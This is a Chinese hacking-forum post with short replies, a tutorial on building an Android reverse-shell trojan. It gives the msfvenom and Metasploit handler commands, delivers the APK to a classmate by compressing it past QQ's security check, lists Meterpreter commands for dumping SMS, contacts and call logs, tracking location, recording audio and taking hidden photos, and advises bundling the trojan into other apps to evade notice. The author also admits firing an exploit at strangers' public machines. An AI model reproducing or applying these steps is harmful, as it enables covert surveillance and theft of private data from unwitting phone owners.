用户
搜索

[思路/技术] MSF反弹shell(安卓)

  • TA的每日心情
    开心
    2019-9-10 00:01
  • 签到天数: 17 天

    连续签到: 1 天

    [LV.4]经常看看II

    实习版主

    Rank: 7Rank: 7Rank: 7

    4

    主题

    73

    帖子

    357

    魔法币
    收听
    0
    粉丝
    2
    注册时间
    2016-10-9
    发表于 2019-9-10 00:00:15 31660
    本帖最后由 Mstery夕颜 于 2019-9-10 00:07 编辑

    0x00 前言

    最近爆出来的0708exp非常火,但等我反应过来时已经是星期日了,来了学校之后,由于没有靶机给我复现,所以出于无奈我只能直接打别人公网的机子,但是尝试着打了十几个都失败了,也就放弃了。
    第二天上课时我正发着呆,突然想到学校的机房上我装有kail的虚拟机,于是就想试试MSF的反弹shell(实不相瞒,这还是我第一次玩MSF。)由于学校的机子实在太卡,而且XP系统也不太熟悉,导致我到快下课时才配置好,回到宿舍后,我就用我手机上的kali,来试试我同学的手机能不能弹。

    0x01 配置MSF

    启动MSF(屁话):

    使用msfVENOM生成安卓木马:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 R > /root/apk.apk

    加载模块及设置payload:

    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp

    配置参数:

    set LHOST 这里设置为跟上面一样
    set LPORT 同上

    最后开始监听即可:

    exploit

    0x02 用法

    MSF生成软件后需要签名,手机的话可以用MT管理器。

    这里我是通过QQ发送给同学,由于QQ安全检测,所以无法直接发送安装包给同学,于是我压缩了一次。

    同学在手机上安装并点击运行后,成功反弹shell:

    功能的话,因为我是晚上写的文章,所以功能我就不进行实测了(同学想睡觉,一直在催我)。

    0x03 命令介绍

    输入help查看命令手册
    命令太多,这里就介绍几个可能会用上的

    app_install #安装软件
    app_list #列出该手机安装的软件
    app_run #启动该手机的软件(貌似是后台启动,我测试是没有反应的)
    app_uninstall #卸载该手机安装的软件
    
    send_sms #发送短信
    check_root #检查手机是否root
    dump_calllog #获取通话记录
    dump_contacts #获取联系人
    dump_sms #获取短信
    geolocate #获取定位
    wlan_geolocate #基于wlan获取定位
    hide_app_icon #隐藏在桌面的图标
    
    record_mic #开始录音
    webcam_chat #开始视频通话
    webcam_snap #隐秘拍照(我测试是要在息屏状态才可以)
    webcam_list #列出摄像头
    webcam_stream
    
    shell #获取一个shell
    sysinfo #获取系统信息
    
    download #下载一个文件至本机
    upload #上传一个文件到被攻击机
    search #搜索文件

    0x04 后记

    使用msfvenom生成的安卓木马的话,软件会获取大量权限,如果你单单是这个软件不仅别人以为软件有问题会卸载,而且软件获取权限的时候很容易暴露,我本人是推荐捆绑在别的软件上来操作。如果你在内网的话,可以看看我之前发的内网映射教程


    发表于 2019-9-10 10:00:38
    夕颜NB~
    使用道具 举报 回复
    夕颜大表哥6666
    使用道具 举报 回复
    这个肯定用得到,留一个脚印
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册